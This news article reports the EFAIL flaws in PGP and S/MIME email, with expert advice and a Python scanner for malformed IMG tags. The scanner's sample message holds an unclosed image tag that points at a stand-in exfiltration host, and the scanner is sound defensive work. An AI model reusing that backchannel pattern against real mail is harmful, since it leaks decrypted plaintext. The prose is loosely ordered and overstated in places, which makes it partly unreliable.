Encrypted Emails At Risk From Two New Attacks


According to security researcher and professor Sebastian Schinzel of FH Münster, PGP and S/MIME email encryption contain a flaw that allows the plaintext of a message to be recovered. Unfortunately, guarding messages from an attacker with full access to your data is one of the primary use cases for both encryption formats. "EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages." From there, the attacker manipulates the ciphertext of the email.

Cluley also highlighted that because Efail attacks rely on past encrypted emails being sent to the target, it is a visible and obvious attack method that could be easily identified using a script that scans incoming email for malformed IMG tags.

The vulnerabilities in the PGP and S/MIME standards pose an "immediate risk" to email communication, including the potential exposure of the contents of past messages, said the Electronic Frontier Foundation, a US digital rights group. They do note, however, that disabling HTML rendering won't completely stop EFAIL attacks. Efforts to make email safer haven't seen widespread adoption because these solutions are "hacks" on top of legacy infrastructure, resulting in an error-prone and clunky user experience. The organization provided step-by-step guides explaining how to disable PGP in Apple Mail, Outlook, and Thunderbird, the most popular clients affected by EFAIL.

'If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now'.

The researchers used CBC/CFB gadgets "to inject malicious plaintext snippets into encrypted emails that abuse existing and standard conforming backchannels, for example, in HTML, CSS, or x509 functionality, to exfiltrate the full plaintext after decryption".
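The scanner Cluley describes above (one that checks incoming mail for malformed IMG tags) and the HTML backchannel the researchers quote can be illustrated with a small MIME check. This is an added example, not code from the article, the researchers, or the EFF; the two sample messages are constructed, and the ciphertext bodies are placeholders.

```python
import email
import re
from email import policy

# Constructed sample: an HTML part whose <img src=" attribute is never closed,
# placed directly before an encrypted part. A client that renders both parts as
# one HTML document would splice the decrypted text into the image URL.
SUSPICIOUS = b"""MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html

<img src="http://exfil.example/
--b1
Content-Type: application/pkcs7-mime; smime-type=enveloped-data

CONSTRUCTED-CIPHERTEXT-PLACEHOLDER
--b1--
"""

# Constructed sample: well-formed HTML next to an encrypted part; should pass.
BENIGN = b"""MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html

<p>See attached.</p><img src="cid:logo" alt="">
--b1
Content-Type: application/pkcs7-mime; smime-type=enveloped-data

CONSTRUCTED-CIPHERTEXT-PLACEHOLDER
--b1--
"""

# A tag that starts but never reaches its closing '>' before the part ends.
UNCLOSED_TAG = re.compile(r"<[a-zA-Z][^>]*\Z")


def is_encrypted_part(part):
    """True for S/MIME envelopes, PGP/MIME containers and inline PGP armour."""
    ctype = part.get_content_type()
    if ctype in ("application/pkcs7-mime", "multipart/encrypted"):
        return True
    if part.is_multipart():
        return False
    return b"-----BEGIN PGP MESSAGE-----" in (part.get_payload(decode=True) or b"")


def scan_message(raw):
    """Return (part index, followed_by_encrypted_part) for every HTML part
    that ends in an unclosed tag; walk() order is the rendering order."""
    parts = list(email.message_from_bytes(raw, policy=policy.default).walk())
    findings = []
    for i, part in enumerate(parts):
        if part.get_content_type() != "text/html":
            continue
        html = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
        if UNCLOSED_TAG.search(html.rstrip()):
            nxt = i + 1 < len(parts) and is_encrypted_part(parts[i + 1])
            findings.append((i, bool(nxt)))
    return findings
```

A finding with the second field True is the pattern worth quarantining or stripping of HTML before the client sees it.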


The attacker first manages to get hold of an encrypted email. The EFF has asked service providers to communicate the news to all users and to request that they disable the affected plugins, including Thunderbird with Enigmail, Apple Mail with GPGTools, and Outlook with Gpg4win.

It is also possible to decrypt emails with PGP decryption tools separate from email programs.

EFF said in a blog post that users should uninstall PGP until the flaw is patched.

Werner Koch, principal author of GNU Privacy Guard (GnuPG), a free implementation of the OpenPGP standard, opened a discussion on the issue in which he said that the attack should not work if authenticated encryption (which GnuPG implements as the modification detection code, or MDC) is in use, which is the preferred configuration.

Email is no longer a secure communication medium.